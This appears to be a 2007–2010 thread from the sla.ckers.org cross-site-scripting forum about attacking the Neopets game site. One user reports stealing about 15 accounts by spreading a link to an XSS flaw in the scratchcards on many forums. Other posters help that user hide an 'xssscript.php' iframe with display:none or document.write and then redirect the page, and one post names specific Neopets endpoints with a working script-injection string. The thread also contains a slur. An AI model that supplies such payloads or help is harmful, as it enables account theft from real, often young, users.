sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: Neopets?
Posted by: ckore
Date: January 19, 2007 05:42AM

A little hint:
Don't use style="width:0px;height:0px;border:0px;" only, because if the page has something like this in its CSS:
iframe {
padding:100px;
}
then the following code or text after the iframe will have a large space between itself and the text before the iframe.
style="display:none" works fine and is more than enough ;)

Re: Neopets?
Posted by: hasse
Date: January 19, 2007 11:54AM

ckore Wrote:
-------------------------------------------------------
> A little hint:
> Don't use style="width:0px;height:0px;border:0px;"
> only, because if the page has something like this
> in its CSS:
>
> iframe {
> padding:100px;
> }
> then the following code or text after the iframe
> will have a large space between itself and the
> text before the iframe.
> style="display:none" works fine and is more than
> enough ;)


Well, if you're creating the page yourself, like the idea was, then that isn't really an issue.



Edited 1 time(s). Last edit at 01/19/2007 12:24PM by hasse.

Re: Neopets?
Posted by: mutantsrus
Date: October 01, 2007 10:03PM

I found an xss vuln in the scratchcards! Go here to get the link:

http://www.mutantsrus.com/neopets.html

Re: Neopets?
Posted by: Spyware
Date: October 02, 2007 06:43AM

Heh, try fishing in the right river. They won't bite here.

Re: Neopets?
Posted by: mutantsrus
Date: October 02, 2007 09:46PM

...That would be why I posted that on like twenty neopets related forums... the results are rather interesting. I've gotten about 15 accounts so far.

Re: Neopets?
Posted by: mutantsrus
Date: October 04, 2007 06:46AM

Quote
----------
Ohhh how cool, thanks!

Quick question, one...do you have aim or msn?

two...

I'm trying to do

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

So it does the xss script and then goes to google...but it seems like it just goes to google and forgets about the iframe. When I remove the google redirection it works though so I'm confused :P
----------------------------------

Just use script tags.
<script>document.write('<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>')</script>
<script>
location.href="http://www.google.com"
</script>


That should do the trick

Re: Neopets?
Posted by: fragge
Date: April 09, 2008 05:56PM

why did you guys help this kid.. he has no clue how to code, and just copied and pasted your replies. this is where gareth's codetcha comes in handy..... (btw replying to this due to current post on neopets.. god i haven't seen that "game" in over 8-9 years. can't believe it's still going strong)

Re: Neopets?
Date: April 09, 2008 08:04PM

I never took part in such faggotry, but it's no longer simply a game, fragge. They've expanded their empire, and now have commercials on television, digital pocket games, and stuffed creatures for sale.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Neopets?
Posted by: fragge
Date: April 09, 2008 09:46PM

ugh, almost as sickening as apple's line of consumer products.

Re: Neopets?
Posted by: nemessis
Date: April 11, 2008 05:58AM

Tested with IE6 and Firefox

Go to http://arcade.neopets.com/tellafriend.php and put "><script>alert(1)</script> in the name form.

Another one is located here http://arcade.neopets.com/contact.php

http://www.rstcenter.com - Romanian Security Team
Limousine rentals

Re: Neopets?
Posted by: ExtraBB
Date: February 15, 2010 10:54AM

Is neopets still vulnerable?

Re: Neopets?
Posted by: id
Date: February 15, 2010 10:44PM

I'll cut you

-id

Re: Neopets?
Posted by: PaPPy
Date: February 16, 2010 07:22AM

rofl, that made my day

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 02/16/2010 07:23AM by PaPPy.
